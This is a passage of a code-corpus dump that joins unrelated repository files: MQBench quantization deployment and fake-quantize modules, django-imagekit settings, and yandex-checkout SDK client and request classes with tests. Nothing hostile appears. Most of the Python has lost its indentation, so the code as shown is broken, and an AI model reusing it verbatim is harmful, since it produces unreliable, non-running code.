redundant_nodes = self.deal_with_weight_fakequant(node, out2node, inp2node, named_initializer)
tensor_name, scale, zero_point, qmin, qmax = self.parse_qparams(node, name2data)
nodes_to_be_removed.extend(redundant_nodes)
self.clip_weight(node, name2data, inp2node, named_initializer)
else:
# fake quantize for activations
self.deal_with_activation_fakequant(node, inp2node)
tensor_name, scale, zero_point, qmin, qmax = self.parse_qparams(node, name2data)
for out in graph.output:
if out.name == node.output[0]:
out.name = tensor_name
if backend == 'tensorrt':
clip_ranges[tensor_name] = float(scale * min(-qmin, qmax))
elif backend == 'snpe':
clip_ranges[tensor_name] = [
{'bitwidth': int(np.log2(qmax - qmin + 1)),
'min': float(scale * (qmin - zero_point)),
'max': float(scale * (qmax - zero_point))}
]
if backend == 'ppl':
clip_ranges[tensor_name] = {'step': float(scale),
'zero_point': int(zero_point),
'min': float(scale * (qmin - zero_point)),
'max': float(scale * (qmax - zero_point)),
'bit': int(np.log2(qmax - qmin + 1)),
'type': "biased",
}
elif backend == 'vitis':
clip_ranges[tensor_name] = {'scale': float(scale)}
elif backend == 'ppl-cuda':
clip_ranges[tensor_name] = float(max(-scale * (qmin - zero_point), scale * (qmax - zero_point)))
for node in nodes_to_be_removed:
graph.node.remove(node)
clip_ranges = self.post_process_clip_ranges(clip_ranges, graph, inp2node)
if backend == 'tensorrt':
context = {"tensorrt": {"blob_range": clip_ranges}}
elif backend == 'snpe':
context = {'activation_encodings': clip_ranges, 'param_encodings': {}}
elif backend == 'ppl':
context = {"ppl": clip_ranges}
elif backend == 'vitis':
context = {'vitis': clip_ranges}
elif backend == 'ppl-cuda':
context = {'ppl-cuda': clip_ranges}
output_path = os.path.dirname(onnx_path)
context_filename = os.path.join(output_path, '{}_clip_ranges.json'.format(model_name))
with open(context_filename, 'w') as f:
json.dump(context, f, indent=4)
onnx_filename = os.path.join(output_path, '{}_deploy_model.onnx'.format(model_name))
onnx.save(model, onnx_filename)
# do post processing for vitis
if backend == 'ppl-cuda':
with open(context_filename, 'w') as f:
for k, v in clip_ranges.items():
f.write('{}: {}\n'.format(k, v))
if backend == 'vitis' and USE_XIR:
xir_compiler = XIR_process()
            xir_compiler.do_compile(onnx.load(onnx_path), onnx.load(onnx_filename), name=onnx_filename)
logger.info("Finish xmodel converting process.")
logger.info("Finish deploy process.")
remove_fakequantize_and_collect_params = LinearQuantizer_process().remove_fakequantize_and_collect_params
```
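A usage sketch for the exported entry point (the ONNX path is a hypothetical placeholder; it assumes a fake-quantized model was already exported). The call writes `<model_name>_deploy_model.onnx` and `<model_name>_clip_ranges.json` next to the input file:

```python
from mqbench.deploy.deploy_linear import remove_fakequantize_and_collect_params

remove_fakequantize_and_collect_params(
    onnx_path='resnet18_mqbench.onnx',  # hypothetical export path
    model_name='resnet18',
    backend='tensorrt')                 # or 'snpe', 'ppl', 'vitis', 'ppl-cuda'
```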
#### File: mqbench/fake_quantize/lsq.py
```python
from functools import partial
import torch
from torch.nn.parameter import Parameter
from mqbench.fake_quantize.quantize_base import QuantizeBase
from mqbench.utils import is_symmetric_quant, is_tracing_state
class LearnableFakeQuantize(QuantizeBase):
r""" This is an extension of the FakeQuantize module in fake_quantize.py, which
    supports more generalized lower-bit quantization and supports learning of the scale
and zero point parameters through backpropagation. For literature references,
please see the class _LearnableFakeQuantizePerTensorOp.
In addition to the attributes in the original FakeQuantize module, the _LearnableFakeQuantize
module also includes the following attributes to support quantization parameter learning.
"""
def __init__(self, observer, scale=1., zero_point=0., use_grad_scaling=True, **observer_kwargs):
super(LearnableFakeQuantize, self).__init__(observer, **observer_kwargs)
self.use_grad_scaling = use_grad_scaling
self.scale = Parameter(torch.tensor([scale]))
self.zero_point = Parameter(torch.tensor([zero_point]))
self.register_buffer('eps', torch.tensor([torch.finfo(torch.float32).eps]))
# Check whether the module will load a state dict;
# Initialize the shape of per-channel 'scale' and 'zero-point' before copying values
class PerChannelLoadHook:
def __init__(self, module):
self.hook = module._register_load_state_dict_pre_hook(partial(self.hook_fn, module=module))
def hook_fn(self, state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs,
module):
if module.ch_axis == -1:
# no per-channel parameters
return
for module_key, param in module._parameters.items():
if module_key not in ["scale", "zero_point"]:
continue
candidate = prefix + module_key
if candidate in state_dict:
input_param = state_dict[candidate]
if param.shape != input_param.shape:
param.data = torch.ones_like(input_param, dtype=param.dtype, device=param.device)
def close(self):
self.hook.remove()
self.load_state_dict_hook = PerChannelLoadHook(self)
@torch.jit.export
def extra_repr(self):
return 'fake_quant_enabled={}, observer_enabled={}, ' \
'quant_min={}, quant_max={}, dtype={}, qscheme={}, ch_axis={}, ' \
'scale={}, zero_point={}'.format(
self.fake_quant_enabled, self.observer_enabled,
self.quant_min, self.quant_max,
self.dtype, self.qscheme, self.ch_axis, self.scale if self.ch_axis == -1 else 'List',
self.zero_point if self.ch_axis == -1 else 'List')
def forward(self, X):
# Learnable fake quantize have to zero_point.float() to make it learnable.
if self.observer_enabled[0] == 1:
self.activation_post_process(X.detach())
_scale, _zero_point = self.activation_post_process.calculate_qparams()
_scale = _scale.to(self.scale.device)
_zero_point = _zero_point.to(self.zero_point.device)
if self.ch_axis != -1:
self.scale.data = torch.ones_like(_scale)
self.zero_point.data = torch.zeros_like(_zero_point.float())
self.scale.data.copy_(_scale)
self.zero_point.data.copy_(_zero_point.float())
else:
self.scale.data.abs_()
self.scale.data.clamp_(min=self.eps.item())
if self.fake_quant_enabled[0] == 1:
if is_symmetric_quant(self.qscheme):
self.zero_point.data.zero_()
else:
                self.zero_point.data.clamp_(self.quant_min, self.quant_max)
if self.is_per_channel:
if self.use_grad_scaling:
grad_factor = 1.0 / (X.numel() / X.shape[self.ch_axis] * self.quant_max) ** 0.5
else:
grad_factor = 1.0
if is_tracing_state():
X = FakeQuantizeLearnablePerchannelAffine.apply(
X, self.scale, self.zero_point, self.ch_axis,
self.quant_min, self.quant_max, grad_factor)
else:
X = _fake_quantize_learnable_per_channel_affine_training(
X, self.scale, self.zero_point, self.ch_axis,
self.quant_min, self.quant_max, grad_factor)
else:
if self.use_grad_scaling:
grad_factor = 1.0 / (X.numel() * self.quant_max) ** 0.5
else:
grad_factor = 1.0
X = torch._fake_quantize_learnable_per_tensor_affine(
X, self.scale, self.zero_point,
self.quant_min, self.quant_max, grad_factor)
return X
def _fake_quantize_learnable_per_channel_affine_training(x, scale, zero_point, ch_axis, quant_min, quant_max, grad_factor):
zero_point = (zero_point.round() - zero_point).detach() + zero_point
new_shape = [1] * len(x.shape)
new_shape[ch_axis] = x.shape[ch_axis]
scale = grad_scale(scale, grad_factor).reshape(new_shape)
zero_point = grad_scale(zero_point, grad_factor).reshape(new_shape)
x = x / scale + zero_point
x = (x.round() - x).detach() + x
x = torch.clamp(x, quant_min, quant_max)
return (x - zero_point) * scale
def grad_scale(t, scale):
return (t - (t * scale)).detach() + (t * scale)
class FakeQuantizeLearnablePerchannelAffine(torch.autograd.Function):
@staticmethod
def forward(ctx, x, scale, zero_point, ch_axis, quant_min, quant_max, grad_factor):
return _fake_quantize_learnable_per_channel_affine_training(x, scale, zero_point, ch_axis,
quant_min, quant_max, grad_factor)
@staticmethod
def symbolic(g, x, scale, zero_point, ch_axis, quant_min, quant_max, grad_factor):
return g.op("::FakeQuantizeLearnablePerchannelAffine", x, scale, zero_point, quant_min_i=quant_min, quant_max_i=quant_max)
```
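The `grad_scale` helper above is the LSQ straight-through trick: the forward value passes through unchanged while the gradient is multiplied by the scale factor. A self-contained check:

```python
import torch

def grad_scale(t, scale):
    return (t - (t * scale)).detach() + (t * scale)

s = torch.tensor([2.0], requires_grad=True)
y = grad_scale(s, 0.25)
print(y.item())       # 2.0  -- forward value is identical
y.backward()
print(s.grad.item())  # 0.25 -- gradient scaled by the factor
```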
#### File: intrinsic/modules/fused.py
```python
from torch.nn.intrinsic import _FusedModule
from torch.nn import Linear, BatchNorm1d, BatchNorm2d, ReLU, ConvTranspose2d, Conv2d
class LinearBn1d(_FusedModule):
r"""This is a sequential container which calls the Linear and Batch Norm 1d modules.
During quantization this will be replaced with the corresponding fused module."""
def __init__(self, linear, bn):
assert type(linear) == Linear and type(bn) == BatchNorm1d, \
'Incorrect types for input modules{}{}'.format(
type(linear), type(bn))
super().__init__(linear, bn)
class ConvTransposeBn2d(_FusedModule):
def __init__(self, deconv, bn):
assert type(deconv) == ConvTranspose2d and type(bn) == BatchNorm2d, \
'Incorrect types for input modules{}{}'.format(
type(deconv), type(bn))
super().__init__(deconv, bn)
class ConvTransposeBnReLU2d(_FusedModule):
def __init__(self, deconv, bn, relu):
assert type(deconv) == ConvTranspose2d and type(bn) == BatchNorm2d and type(relu) == ReLU, \
'Incorrect types for input modules{}{}{}'.format(
type(deconv), type(bn), type(relu))
super().__init__(deconv, bn, relu)
class ConvTransposeReLU2d(_FusedModule):
def __init__(self, deconv, relu):
assert type(deconv) == ConvTranspose2d and type(relu) == ReLU, \
'Incorrect types for input modules{}{}'.format(
type(deconv), type(relu))
super().__init__(deconv, relu)
class ConvBn2d(_FusedModule):
def __init__(self, conv, bn):
assert type(conv) == Conv2d and type(bn) == BatchNorm2d, \
'Incorrect types for input modules{}{}'.format(
type(conv), type(bn))
super().__init__(conv, bn)
class ConvBnReLU2d(_FusedModule):
def __init__(self, conv, bn, relu):
assert type(conv) == Conv2d and type(bn) == BatchNorm2d and type(relu) == ReLU, \
'Incorrect types for input modules{}{}{}'.format(
type(conv), type(bn), type(relu))
super().__init__(conv, bn, relu)
class ConvReLU2d(_FusedModule):
def __init__(self, conv, relu):
assert type(conv) == Conv2d and type(relu) == ReLU, \
'Incorrect types for input modules{}{}'.format(
type(conv), type(relu))
super().__init__(conv, relu)
```
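These containers are plain `nn.Sequential` subclasses, so calling one runs the wrapped ops in order. A small construction sketch (the import path is assumed from the file layout; shapes are arbitrary):

```python
import torch
from torch.nn import Conv2d, BatchNorm2d, ReLU
from mqbench.nn.intrinsic.modules.fused import ConvBnReLU2d  # assumed path

fused = ConvBnReLU2d(Conv2d(3, 16, 3, padding=1), BatchNorm2d(16), ReLU())
out = fused(torch.randn(1, 3, 32, 32))  # conv -> bn -> relu
print(out.shape)  # torch.Size([1, 16, 32, 32])
```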
#### File: test/observer/test_observer.py
```python
import torch
import unittest
from mqbench.prepare_by_platform import prepare_by_platform, BackendType
from mqbench.convert_deploy import convert_deploy
from mqbench.utils.state import enable_calibration, enable_quantization
class TestObserver(unittest.TestCase):
def test_quantile_observer(self):
model_to_quantize = torch.hub.load('pytorch/vision', 'resnet18', pretrained=False)
dummy_input = torch.randn(2, 3, 224, 224, device='cpu')
model_to_quantize.train()
extra_qconfig_dict = {
'w_observer': 'MinMaxObserver',
'a_observer': 'EMAQuantileObserver',
'w_fakequantize': 'FixedFakeQuantize',
'a_fakequantize': 'FixedFakeQuantize',
}
prepare_custom_config_dict = {'extra_qconfig_dict': extra_qconfig_dict}
model_prepared = prepare_by_platform(model_to_quantize, BackendType.Tensorrt, prepare_custom_config_dict)
enable_calibration(model_prepared)
model_prepared(dummy_input)
enable_quantization(model_prepared)
loss = model_prepared(dummy_input).sum()
loss.backward()
def test_ema_observer(self):
model_to_quantize = torch.hub.load('pytorch/vision', 'resnet18', pretrained=False)
dummy_input = torch.randn(2, 3, 224, 224, device='cpu')
model_to_quantize.train()
extra_qconfig_dict = {
'w_observer': 'MinMaxObserver',
'a_observer': 'EMAMinMaxObserver',
'w_fakequantize': 'FixedFakeQuantize',
'a_fakequantize': 'FixedFakeQuantize',
}
prepare_custom_config_dict = {'extra_qconfig_dict': extra_qconfig_dict}
model_prepared = prepare_by_platform(model_to_quantize, BackendType.Tensorrt, prepare_custom_config_dict)
enable_calibration(model_prepared)
model_prepared(dummy_input)
enable_quantization(model_prepared)
loss = model_prepared(dummy_input).sum()
loss.backward()
def test_minmax_observer(self):
model_to_quantize = torch.hub.load('pytorch/vision', 'resnet18', pretrained=False)
dummy_input = torch.randn(2, 3, 224, 224, device='cpu')
model_to_quantize.train()
extra_qconfig_dict = {
'w_observer': 'MinMaxObserver',
'a_observer': 'MinMaxObserver',
'w_fakequantize': 'FixedFakeQuantize',
'a_fakequantize': 'FixedFakeQuantize',
}
prepare_custom_config_dict = {'extra_qconfig_dict': extra_qconfig_dict}
model_prepared = prepare_by_platform(model_to_quantize, BackendType.Tensorrt, prepare_custom_config_dict)
enable_calibration(model_prepared)
model_prepared(dummy_input)
enable_quantization(model_prepared)
loss = model_prepared(dummy_input).sum()
loss.backward()
def test_lsq_observer(self):
model_to_quantize = torch.hub.load('pytorch/vision', 'resnet18', pretrained=False)
dummy_input = torch.randn(2, 3, 224, 224, device='cpu')
model_to_quantize.train()
extra_qconfig_dict = {
'w_observer': 'LSQObserver',
'a_observer': 'LSQObserver',
'w_fakequantize': 'FixedFakeQuantize',
'a_fakequantize': 'FixedFakeQuantize',
}
prepare_custom_config_dict = {'extra_qconfig_dict': extra_qconfig_dict}
model_prepared = prepare_by_platform(model_to_quantize, BackendType.Tensorrt, prepare_custom_config_dict)
enable_calibration(model_prepared)
model_prepared(dummy_input)
enable_quantization(model_prepared)
loss = model_prepared(dummy_input).sum()
loss.backward()
def test_clip_std_observer(self):
model_to_quantize = torch.hub.load('pytorch/vision', 'resnet18', pretrained=False)
dummy_input = torch.randn(2, 3, 224, 224, device='cpu')
model_to_quantize.train()
extra_qconfig_dict = {
'w_observer': 'ClipStdObserver',
'a_observer': 'ClipStdObserver',
'w_fakequantize': 'FixedFakeQuantize',
'a_fakequantize': 'FixedFakeQuantize',
}
prepare_custom_config_dict = {'extra_qconfig_dict': extra_qconfig_dict}
model_prepared = prepare_by_platform(model_to_quantize, BackendType.Tensorrt, prepare_custom_config_dict)
enable_calibration(model_prepared)
model_prepared(dummy_input)
enable_quantization(model_prepared)
loss = model_prepared(dummy_input).sum()
loss.backward()
``` |
{
"source": "a1tus/django-imagekit",
"score": 2
} |
#### File: django-imagekit/imagekit/conf.py
```python
from appconf import AppConf
from django.conf import settings
class ImageKitConf(AppConf):
CACHEFILE_NAMER = 'imagekit.cachefiles.namers.hash'
SPEC_CACHEFILE_NAMER = 'imagekit.cachefiles.namers.source_name_as_path'
CACHEFILE_DIR = 'CACHE/images'
DEFAULT_CACHEFILE_BACKEND = 'imagekit.cachefiles.backends.Simple'
DEFAULT_CACHEFILE_STRATEGY = 'imagekit.cachefiles.strategies.JustInTime'
DEFAULT_FILE_STORAGE = None
CACHE_BACKEND = None
CACHE_PREFIX = 'imagekit:'
USE_MEMCACHED_SAFE_CACHE_KEY = True
def configure_cache_backend(self, value):
if value is None:
try:
from django.core.cache.backends.dummy import DummyCache
except ImportError:
dummy_cache = 'dummy://'
else:
dummy_cache = 'django.core.cache.backends.dummy.DummyCache'
# DEFAULT_CACHE_ALIAS doesn't exist in Django<=1.2
try:
from django.core.cache import DEFAULT_CACHE_ALIAS as default_cache_alias
except ImportError:
default_cache_alias = 'default'
if settings.DEBUG:
value = dummy_cache
elif default_cache_alias in getattr(settings, 'CACHES', {}):
value = default_cache_alias
else:
value = getattr(settings, 'CACHE_BACKEND', None) or dummy_cache
return value
def configure_default_file_storage(self, value):
if value is None:
value = settings.DEFAULT_FILE_STORAGE
return value
```
#### File: django-imagekit/imagekit/importers.py
```python
import re
import sys
class ProcessorImporter(object):
"""
The processors were moved to the PILKit project so they could be used
separtely from ImageKit (which has a bunch of Django dependencies). However,
there's no real need to expose this fact (and we want to maintain backwards
compatibility), so we proxy all "imagekit.processors" imports to
"pilkit.processors" using this object.
"""
pattern = re.compile(r'^imagekit\.processors((\..*)?)$')
def find_module(self, name, path=None):
if self.pattern.match(name):
return self
def load_module(self, name):
if name in sys.modules:
return sys.modules[name]
        from importlib import import_module  # stdlib importlib; avoids the removed django.utils.importlib shim
new_name = self.pattern.sub(r'pilkit.processors\1', name)
mod = import_module(new_name)
sys.modules[name] = mod
return mod
sys.meta_path.insert(0, ProcessorImporter())
``` |
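In effect, importing this module once installs the proxy, after which legacy imports resolve to pilkit. A usage sketch (assuming pilkit is installed; `ResizeToFill` is one of its processors):

```python
import imagekit.importers  # noqa: F401 -- registers the meta_path proxy
from imagekit.processors import ResizeToFill  # served by pilkit.processors
print(ResizeToFill.__module__)  # points into the pilkit package
```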
{
"source": "a1tus/yandex-checkout-sdk-python",
"score": 3
} |
#### File: test/unit/test_receipt_request.py
```python
import unittest
from yandex_checkout import Amount
from yandex_checkout.domain.common.receipt_type import ReceiptType
from yandex_checkout.domain.models.currency import Currency
from yandex_checkout.domain.models.receipt_customer import ReceiptCustomer
from yandex_checkout.domain.models.receipt_item_supplier import ReceiptItemSupplier
from yandex_checkout.domain.models.settlement import SettlementType, Settlement
from yandex_checkout.domain.request.receipt_item_request import ReceiptItemRequest
from yandex_checkout.domain.request.receipt_request import ReceiptRequest
class TestReceiptRequest(unittest.TestCase):
def test_request_cast(self):
request = ReceiptRequest()
request.type = ReceiptType.PAYMENT
request.send = True
request.customer = ReceiptCustomer({'phone': '79990000000', 'email': '<EMAIL>'})
request.items = [
ReceiptItemRequest({
"description": "Product 1",
"quantity": 2.0,
"amount": {
"value": 250.0,
"currency": Currency.RUB
},
"vat_code": 2
}),
ReceiptItemRequest({
"description": "Product 2",
"quantity": 1.0,
"amount": {
"value": 100.0,
"currency": Currency.RUB
},
"vat_code": 2
})
]
request.settlements = [
Settlement({
'type': SettlementType.CASHLESS,
'amount': {
'value': 250.0,
'currency': Currency.RUB
}
})
]
request.tax_system_code = 1
request.payment_id = '215d8da0-000f-50be-b000-0003308c89be'
self.assertEqual({
'type': ReceiptType.PAYMENT,
'send': True,
'customer': {'email': '<EMAIL>', 'phone': '79990000000'},
'email': '<EMAIL>',
'phone': '79990000000',
'items': [
{
'description': 'Product 1',
'quantity': 2.0,
'amount': {
'value': 250.0,
'currency': Currency.RUB
},
'vat_code': 2
},
{
'description': 'Product 2',
'quantity': 1.0,
'amount': {
'value': 100.0,
'currency': Currency.RUB
},
'vat_code': 2
}
],
'settlements': [
{
'type': SettlementType.CASHLESS,
'amount': {
'value': 250.0,
'currency': Currency.RUB
}
}
],
'tax_system_code': 1,
'payment_id': '215d8da0-000f-50be-b000-0003308c89be'
}, dict(request))
def test_request_setters(self):
request = ReceiptRequest({
'type': ReceiptType.PAYMENT,
'send': True,
'email': '<EMAIL>',
'phone': '79990000000',
'items': [
{
'description': 'Product 1',
'quantity': 2.0,
'amount': Amount({
'value': 250.0,
'currency': Currency.RUB
}),
'vat_code': 2,
'payment_mode': 'full_payment',
'payment_subject': 'commodity',
'country_of_origin_code': 'CN',
'product_code': '00 00 00 01 00 21 FA 41 00 23 05 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 AB 00',
'customs_declaration_number': '10714040/140917/0090376',
'excise': '20.00',
'supplier': {
'name': 'string',
'phone': 'string',
'inn': 'string'
}
},
{
'description': 'Product 2',
'quantity': 1.0,
'amount': {
'value': 100.0,
'currency': Currency.RUB
},
'vat_code': 2,
'supplier': ReceiptItemSupplier({
'name': 'string',
'phone': 'string',
'inn': 'string'
})
}
],
'settlements': [
{
'type': SettlementType.CASHLESS,
'amount': {
'value': 250.0,
'currency': Currency.RUB
}
}
],
'tax_system_code': 1,
'payment_id': '215d8da0-000f-50be-b000-0003308c89be',
'on_behalf_of': 'string'
})
self.assertIsInstance(request.customer, ReceiptCustomer)
self.assertIsInstance(request.items, list)
self.assertIsInstance(request.settlements, list)
with self.assertRaises(TypeError):
request.items[0].supplier = 'invalid supplier'
with self.assertRaises(TypeError):
request.items[0].amount = 'invalid amount'
with self.assertRaises(TypeError):
request.customer = 'invalid customer'
with self.assertRaises(TypeError):
request.items = 'invalid items'
with self.assertRaises(TypeError):
request.items = ['invalid item']
with self.assertRaises(TypeError):
request.settlements = 'invalid settlements'
with self.assertRaises(TypeError):
request.settlements = ['invalid settlement']
with self.assertRaises(TypeError):
request.send = 'invalid send'
with self.assertRaises(TypeError):
request.tax_system_code = 'invalid tax_system_code'
def test_request_validate(self):
request = ReceiptRequest()
with self.assertRaises(ValueError):
request.validate()
request.type = ReceiptType.PAYMENT
with self.assertRaises(ValueError):
request.validate()
request.send = True
with self.assertRaises(ValueError):
request.validate()
request.customer = ReceiptCustomer({'phone': '79990000000', 'email': '<EMAIL>'})
with self.assertRaises(ValueError):
request.validate()
request.items = [
ReceiptItemRequest({
"description": "Product 1",
"quantity": 2.0,
"amount": {
"value": 250.0,
"currency": Currency.RUB
},
"vat_code": 2
}),
ReceiptItemRequest({
"description": "Product 2",
"quantity": 1.0,
"amount": {
"value": 100.0,
"currency": Currency.RUB
},
"vat_code": 2
})
]
with self.assertRaises(ValueError):
request.validate()
request.settlements = [
Settlement({
'type': SettlementType.CASHLESS,
'amount': {
'value': 250.0,
'currency': Currency.RUB
}
})
]
with self.assertRaises(ValueError):
request.validate()
request.tax_system_code = 1
with self.assertRaises(ValueError):
request.validate()
request.refund_id = '215d8da0-000f-50be-b000-0003308c89be'
with self.assertRaises(ValueError):
request.validate()
request.type = ReceiptType.REFUND
request.payment_id = '215d8da0-000f-50be-b000-0003308c89be'
with self.assertRaises(ValueError):
request.validate()
request.items = None
request.settlements = None
with self.assertRaises(ValueError):
request.validate()
```
#### File: yandex-checkout-sdk-python/yandex_checkout/client.py
```python
import requests
from requests.adapters import HTTPAdapter
from requests.auth import _basic_auth_str
from urllib3 import Retry
from yandex_checkout import Configuration
from yandex_checkout.domain.common.request_object import RequestObject
from yandex_checkout.domain.common.user_agent import UserAgent
from yandex_checkout.domain.exceptions.api_error import ApiError
from yandex_checkout.domain.exceptions.bad_request_error import BadRequestError
from yandex_checkout.domain.exceptions.forbidden_error import ForbiddenError
from yandex_checkout.domain.exceptions.not_found_error import NotFoundError
from yandex_checkout.domain.exceptions.response_processing_error import ResponseProcessingError
from yandex_checkout.domain.exceptions.too_many_request_error import TooManyRequestsError
from yandex_checkout.domain.exceptions.unauthorized_error import UnauthorizedError
class ApiClient:
endpoint = Configuration.api_endpoint()
def __init__(self):
self.configuration = Configuration.instantiate()
self.shop_id = self.configuration.account_id
self.shop_password = self.configuration.secret_key
self.auth_token = self.configuration.auth_token
self.timeout = self.configuration.timeout
self.max_attempts = self.configuration.max_attempts
self.user_agent = UserAgent()
if self.configuration.agent_framework:
self.user_agent.framework = self.configuration.agent_framework
if self.configuration.agent_cms:
self.user_agent.cms = self.configuration.agent_cms
if self.configuration.agent_module:
self.user_agent.module = self.configuration.agent_module
def request(self, method="", path="", query_params=None, headers=None, body=None):
if isinstance(body, RequestObject):
body.validate()
body = dict(body)
request_headers = self.prepare_request_headers(headers)
raw_response = self.execute(body, method, path, query_params, request_headers)
if raw_response.status_code != 200:
self.__handle_error(raw_response)
return raw_response.json()
def execute(self, body, method, path, query_params, request_headers):
session = self.get_session()
raw_response = session.request(method,
self.endpoint + path,
params=query_params,
headers=request_headers,
json=body)
return raw_response
def get_session(self):
session = requests.Session()
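        # Retry POSTs that come back 202 (accepted but still processing).
        # Note: Retry's "method_whitelist" argument was renamed to
        # "allowed_methods" in urllib3 1.26 and removed in 2.0, so this code
        # assumes an older urllib3 release.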
retries = Retry(total=self.max_attempts,
backoff_factor=self.timeout / 1000,
method_whitelist=['POST'],
status_forcelist=[202])
session.mount('https://', HTTPAdapter(max_retries=retries))
return session
def prepare_request_headers(self, headers):
request_headers = {'Content-type': 'application/json'}
if self.auth_token is not None:
auth_headers = {"Authorization": "Bearer " + self.auth_token}
else:
auth_headers = {"Authorization": _basic_auth_str(self.shop_id, self.shop_password)}
request_headers.update(auth_headers)
request_headers.update({"YM-User-Agent": self.user_agent.get_header_string()})
if isinstance(headers, dict):
request_headers.update(headers)
return request_headers
def __handle_error(self, raw_response):
http_code = raw_response.status_code
if http_code == BadRequestError.HTTP_CODE:
raise BadRequestError(raw_response.json())
elif http_code == ForbiddenError.HTTP_CODE:
raise ForbiddenError(raw_response.json())
elif http_code == NotFoundError.HTTP_CODE:
raise NotFoundError(raw_response.json())
elif http_code == TooManyRequestsError.HTTP_CODE:
raise TooManyRequestsError(raw_response.json())
elif http_code == UnauthorizedError.HTTP_CODE:
raise UnauthorizedError(raw_response.json())
elif http_code == ResponseProcessingError.HTTP_CODE:
raise ResponseProcessingError(raw_response.json())
else:
raise ApiError(raw_response.text)
```
#### File: domain/request/receipt_item_request.py
```python
from decimal import Decimal
from yandex_checkout.domain.common.base_object import BaseObject
from yandex_checkout.domain.models.amount import Amount
from yandex_checkout.domain.models.receipt_item_supplier import ReceiptItemSupplier
class ReceiptItemRequest(BaseObject):
"""
Class representing receipt item data wrapper object
Used in Receipt
"""
__description = None
__quantity = None
__amount = None
__vat_code = None
__payment_mode = None
__payment_subject = None
__product_code = None
__country_of_origin_code = None
__customs_declaration_number = None
__excise = None
__supplier = None
__agent_type = None
@property
def description(self):
return self.__description
@description.setter
def description(self, value):
self.__description = str(value)
@property
def quantity(self):
"""
:return Decimal:
"""
return self.__quantity
@quantity.setter
def quantity(self, value):
self.__quantity = Decimal(float(value))
@property
def amount(self):
return self.__amount
@amount.setter
def amount(self, value):
if isinstance(value, dict):
self.__amount = Amount(value)
elif isinstance(value, Amount):
self.__amount = value
else:
raise TypeError('Invalid amount value type')
@property
def vat_code(self):
return self.__vat_code
@vat_code.setter
def vat_code(self, value):
self.__vat_code = int(value)
@property
def payment_mode(self):
return self.__payment_mode
@payment_mode.setter
def payment_mode(self, value):
self.__payment_mode = str(value)
@property
def payment_subject(self):
return self.__payment_subject
@payment_subject.setter
def payment_subject(self, value):
self.__payment_subject = str(value)
@property
def product_code(self):
return self.__product_code
@product_code.setter
def product_code(self, value):
self.__product_code = str(value)
@property
def country_of_origin_code(self):
return self.__country_of_origin_code
@country_of_origin_code.setter
def country_of_origin_code(self, value):
self.__country_of_origin_code = str(value)
@property
def customs_declaration_number(self):
return self.__customs_declaration_number
@customs_declaration_number.setter
def customs_declaration_number(self, value):
self.__customs_declaration_number = str(value)
@property
def excise(self):
"""
:return Decimal:
"""
return self.__excise
@excise.setter
def excise(self, value):
self.__excise = Decimal(float(value))
@property
def supplier(self):
return self.__supplier
@supplier.setter
def supplier(self, value):
if isinstance(value, dict):
self.__supplier = ReceiptItemSupplier(value)
elif isinstance(value, ReceiptItemSupplier):
self.__supplier = value
else:
raise TypeError('Invalid supplier value type')
@property
def agent_type(self):
return self.__agent_type
@agent_type.setter
def agent_type(self, value):
self.__agent_type = str(value)
```
#### File: domain/request/refund_request.py
```python
from yandex_checkout.domain.common.request_object import RequestObject
from yandex_checkout.domain.models.amount import Amount
from yandex_checkout.domain.models.receipt import Receipt
from yandex_checkout.domain.models.refund_source import RefundSource
class RefundRequest(RequestObject):
__payment_id = None
__amount = None
__description = None
__receipt = None
__sources = None
@property
def payment_id(self):
return self.__payment_id
@payment_id.setter
def payment_id(self, value):
cast_value = str(value)
if len(cast_value) == 36:
self.__payment_id = cast_value
else:
raise ValueError('Invalid payment id value')
@property
def amount(self):
return self.__amount
@amount.setter
def amount(self, value):
if isinstance(value, dict):
self.__amount = Amount(value)
elif isinstance(value, Amount):
self.__amount = value
else:
raise TypeError('Invalid amount value type')
@property
def description(self):
return self.__description
@description.setter
def description(self, value):
cast_value = str(value)
if cast_value and len(cast_value) < 256:
self.__description = cast_value
else:
            raise ValueError('Invalid description value')
@property
def sources(self):
return self.__sources
@sources.setter
def sources(self, value):
if isinstance(value, list):
items = []
for item in value:
if isinstance(item, dict):
items.append(RefundSource(item))
elif isinstance(item, RefundSource):
items.append(item)
else:
raise TypeError('Invalid sources type in refund.sources')
self.__sources = items
else:
raise TypeError('Invalid sources value type in refund_request')
@property
def receipt(self):
return self.__receipt
@receipt.setter
def receipt(self, value):
if isinstance(value, dict):
self.__receipt = Receipt(value)
elif isinstance(value, Receipt):
self.__receipt = value
else:
raise TypeError('Invalid receipt value type')
def validate(self):
if not self.payment_id:
self.__set_validation_error('Payment id not specified')
if not self.amount:
self.__set_validation_error('Amount not specified')
if self.amount.value <= 0.0:
self.__set_validation_error('Invalid amount value: ' + str(self.amount.value))
if self.receipt and self.receipt.has_items():
email = self.receipt.email
phone = self.receipt.phone
if not email and not phone:
self.__set_validation_error('Both email and phone values are empty in receipt')
if not self.receipt.tax_system_code and any(not item.vat_code for item in self.receipt.items):
self.__set_validation_error('Item vat_id and receipt tax_system_id not specified')
def __set_validation_error(self, message):
raise ValueError(message)
```
#### File: yandex-checkout-sdk-python/yandex_checkout/refund.py
```python
import uuid
from yandex_checkout.client import ApiClient
from yandex_checkout.domain.common.http_verb import HttpVerb
from yandex_checkout.domain.request.refund_request import RefundRequest
from yandex_checkout.domain.response.refund_list_response import RefundListResponse
from yandex_checkout.domain.response.refund_response import RefundResponse
class Refund:
base_path = '/refunds'
def __init__(self):
self.client = ApiClient()
@classmethod
def create(cls, params, idempotency_key=None):
"""
Create refund
:param params: data passed to API
:param idempotency_key:
:return:
"""
instance = cls()
path = cls.base_path
if not idempotency_key:
            idempotency_key = uuid.uuid4()
headers = {
'Idempotence-Key': str(idempotency_key)
}
if isinstance(params, dict):
params_object = RefundRequest(params)
elif isinstance(params, RefundRequest):
params_object = params
else:
raise TypeError('Invalid params value type')
response = instance.client.request(HttpVerb.POST, path, None, headers, params_object)
return RefundResponse(response)
@classmethod
def find_one(cls, refund_id):
"""
Get refund information
:param refund_id:
:return: RefundResponse
"""
instance = cls()
if not isinstance(refund_id, str) or not refund_id:
            raise ValueError('Invalid refund_id value')
path = instance.base_path + '/' + refund_id
response = instance.client.request(HttpVerb.GET, path)
return RefundResponse(response)
@classmethod
def list(cls, params):
instance = cls()
path = cls.base_path
response = instance.client.request(HttpVerb.GET, path, params)
return RefundListResponse(response)
``` |
{
"source": "a1varo-costa/EEGPlotter",
"score": 3
} |
